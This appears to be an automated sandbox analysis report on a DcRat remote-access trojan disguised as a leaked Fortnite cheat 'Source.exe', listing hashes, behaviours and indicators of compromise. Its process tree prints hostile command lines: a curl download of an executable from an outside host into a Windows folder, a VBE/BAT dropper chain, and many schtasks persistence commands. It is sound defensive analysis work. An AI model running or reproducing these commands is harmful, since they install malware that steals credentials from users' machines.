Analysis
-
max time kernel
92s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2025 18:58
Static task
static1
Behavioral task
behavioral1
Sample
Source Leak/FortniteExternalBase/util/loadup.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Source Leak/FortniteExternalBase/util/loadup.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Source Leak/FortniteExternalBase/x64/Release/Source.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Source Leak/FortniteExternalBase/x64/Release/Source.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Source Leak/Release/Source.exe
Resource
win7-20240708-en
General
-
Target
Source Leak/Release/Source.exe
-
Size
1.2MB
-
MD5
6179f45e49ae7257c1fb5859dc119f73
-
SHA1
14b8a63e92e4d9254a3949f841631b96f5eaa590
-
SHA256
7dc826deb7225c544091b7a33f6e9093617941d90fba7c5b5057ff97e231270f
-
SHA512
6f492fa5a1c7ba28c269355f80e316db05186ffd9ed28c72b1ce911cb8f46a10049fcfd09008ee99996194f4d154eb46e8b7af98c31db98a4a3690397a46b519
-
SSDEEP
24576:CoJOLUTJcMfM2kO9shrYgTnwxznA1sUo1sUa2hZU6EmC3Fp39zZF35:7BnLUDUZi6EZFbVb
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5080 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1800 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 760 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4396 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5004 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4316 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4300 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2040 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5108 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4748 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1604 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2224 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2268 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1320 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4896 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1540 1840 schtasks.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1308 1840 schtasks.exe 96 -
Downloads MZ/PE file 1 IoCs
flow pid Process 15 2580 curl.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Source.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation physmeme.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Winver.exe -
Executes dropped EXE 3 IoCs
pid Process 2212 physmeme.exe 548 Winver.exe 3772 conhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Media Player\uk-UA\ea1d8f6d871115 Winver.exe File created C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe Winver.exe File created C:\Program Files\Microsoft Office 15\ClientX64\088424020bedd6 Winver.exe File created C:\Program Files (x86)\Windows Media Player\uk-UA\upfc.exe Winver.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Speech\physmeme.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language physmeme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2160 PING.EXE -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings physmeme.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings Winver.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2160 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5108 schtasks.exe 4748 schtasks.exe 1604 schtasks.exe 2224 schtasks.exe 4896 schtasks.exe 1540 schtasks.exe 4396 schtasks.exe 5080 schtasks.exe 760 schtasks.exe 1552 schtasks.exe 4300 schtasks.exe 2040 schtasks.exe 1320 schtasks.exe 1308 schtasks.exe 1800 schtasks.exe 5004 schtasks.exe 4316 schtasks.exe 2268 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 548 Winver.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe 3772 conhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 548 Winver.exe Token: SeDebugPrivilege 3772 conhost.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1796 wrote to memory of 2192 1796 Source.exe 83 PID 1796 wrote to memory of 2192 1796 Source.exe 83 PID 1796 wrote to memory of 636 1796 Source.exe 85 PID 1796 wrote to memory of 636 1796 Source.exe 85 PID 1796 wrote to memory of 2304 1796 Source.exe 86 PID 1796 wrote to memory of 2304 1796 Source.exe 86 PID 2304 wrote to memory of 2580 2304 cmd.exe 87 PID 2304 wrote to memory of 2580 2304 cmd.exe 87 PID 1796 wrote to memory of 2212 1796 Source.exe 90 PID 1796 wrote to memory of 2212 1796 Source.exe 90 PID 1796 wrote to memory of 2212 1796 Source.exe 90 PID 2212 wrote to memory of 1508 2212 physmeme.exe 91 PID 2212 wrote to memory of 1508 2212 physmeme.exe 91 PID 2212 wrote to memory of 1508 2212 physmeme.exe 91 PID 1508 wrote to memory of 3584 1508 WScript.exe 105 PID 1508 wrote to memory of 3584 1508 WScript.exe 105 PID 1508 wrote to memory of 3584 1508 WScript.exe 105 PID 3584 wrote to memory of 548 3584 cmd.exe 107 PID 3584 wrote to memory of 548 3584 cmd.exe 107 PID 548 wrote to memory of 4080 548 Winver.exe 126 PID 548 wrote to memory of 4080 548 Winver.exe 126 PID 4080 wrote to memory of 3776 4080 cmd.exe 128 PID 4080 wrote to memory of 3776 4080 cmd.exe 128 PID 4080 wrote to memory of 2160 4080 cmd.exe 129 PID 4080 wrote to memory of 2160 4080 cmd.exe 129 PID 4080 wrote to memory of 3772 4080 cmd.exe 131 PID 4080 wrote to memory of 3772 4080 cmd.exe 131 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Source Leak\Release\Source.exe"C:\Users\Admin\AppData\Local\Temp\Source Leak\Release\Source.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2192
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn1337.site/builded.txt --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\curl.execurl --silent https://cdn1337.site/builded.txt --output C:\Windows\Speech\physmeme.exe3⤵
- Downloads MZ/PE file
- Drops file in Windows directory
PID:2580
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ESD\jZRzGmZ0nmWlIW7eyKvICIC2GnKeW02cdUcmyP.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ESD\EOO029hu24.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\ESD\Winver.exe"C:\ESD/Winver.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SWDkSOYgMA.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:3776
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2160
-
-
C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe"C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 13 /tr "'C:\ESD\SppExtComObj.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\ESD\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 13 /tr "'C:\ESD\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Cookies\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Users\Admin\Cookies\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Cookies\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Media Player\uk-UA\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\uk-UA\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Media Player\uk-UA\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1604
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\ESD\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\ESD\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2268
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\ESD\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WinverW" /sc MINUTE /mo 5 /tr "'C:\ESD\Winver.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WinverW" /sc MINUTE /mo 9 /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1308
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61B
MD533c54a5f80394595d7f9f5bf2374f68c
SHA1e515abb832132011a48661843ca2cb85ac7b7296
SHA25697ec10319ebe1f05ac4f58bf8619aad0e0af8bcb0f11e8f44a73cd80fc125d2d
SHA5128203808771aac07a702e986204fef3a3c5eb869f4863423b86b8fbb449f5a17700c459e96ec06958bdc17c48825380592aed90a93444e6d30027f3c1002e67bc
-
Filesize
1.8MB
MD5b5c4fa68d74ab47092a46241d6b10a16
SHA1e754f10c51933c1ef98782fbf695e8f21198fe7e
SHA25620e9dafaa42a6b6122ecc150622cf8aabe7a324527df144561de5ba0b486ab2a
SHA5123ab67cb936cab9eb89bb8275309cbc5f56d7f03e554b5cc7bd54305c282b6e8a0feb4af8c1ebc7073d63c371444751c522b030748b4d57c28a768fd6cfdb5293
-
Filesize
202B
MD54652fb55e060252dacdca19aee6266b0
SHA17711f923873149629b869217eea3b9e7b53a37d2
SHA256071d6610f34bb0b1e2f6077550a40faf08475865b2863f3340f44f82fc009c74
SHA5122f73b677f27eb83ec54ecf6c75701e01ae69c8173ea6e081aed443ec19e6f8326de0a4dcb3c808c321f74f1c1916e5a2ecaffed0774fe29ba3889e593bb1515c
-
Filesize
186B
MD56f34cb27d7bca26434e0d57d5f87b4b8
SHA1cb588a7fa3b1feddd2bd0971d366644822584708
SHA25662f27d99a804faf7a518d07684e9fd79e8b3504d101c4cb1722377b2e0237217
SHA512190a9e8f81c6605545955a5acc181e1e877ee60044c95f951da1abcd090ce7206e6a4de76b920ad35416b2bdb914c98a24d58acf44019e97426f3e225b63e06c
-
Filesize
2.1MB
MD51d6941fbe47aa24e563eaad080f6d13a
SHA1438d9a13439a4bd5939f0dc7d5a8a252e802236a
SHA256ca3ef84162bcbf7d8ba6fbe39ab1b64ac743291c967005ac739f8e6baee91e32
SHA512c3949ebd681c06ea0b62790d517ace9ae1531acb5bf9d05a766ac575599a17bdaeda889f599092b61fb34312bcbd5d8cda0193f89a2627af2019b27302b70f7e